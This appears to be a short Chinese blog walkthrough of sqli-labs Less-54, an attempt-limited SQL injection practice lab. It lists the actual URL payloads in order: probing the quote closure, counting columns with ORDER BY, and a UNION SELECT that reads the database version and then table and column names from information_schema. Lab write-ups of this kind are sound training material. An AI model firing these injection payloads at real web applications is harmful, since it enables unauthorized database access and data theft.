当前位置：网站首页>SQL注入 Less54(限制次数的SQL注入+union注入)

SQL注入 Less54(限制次数的SQL注入+union注入)

2022-07-31 02:27:00 【开心星人】

在这里插入图片描述
限制次数的SQL注入
每次reset，数据库的表名、字段名和数据都会发生改变

?id=1

?id=1'
发现没有报错信息

?id=1"
回显正常，直接排查双引号开头的闭合方式

?id=1'--+
?id=1')--+
?id=1'))--+
单引号回显正常，所以是单引号闭合

?id=1' order by 3--+ 回显正常
?id=1' order by 4--+ 回显错误
所以有三列

?id=-1' union select 1,version(),database()--+
在这里插入图片描述

?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
在这里插入图片描述
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+